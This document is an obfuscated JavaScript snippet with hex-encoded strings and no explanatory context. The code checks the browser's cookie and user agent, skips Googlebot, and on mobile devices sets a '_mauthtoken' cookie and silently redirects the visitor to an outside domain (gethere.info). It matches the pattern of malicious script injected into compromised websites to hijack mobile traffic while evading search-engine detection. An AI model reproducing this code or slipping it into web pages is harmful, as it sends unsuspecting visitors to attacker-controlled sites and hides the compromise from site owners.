var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}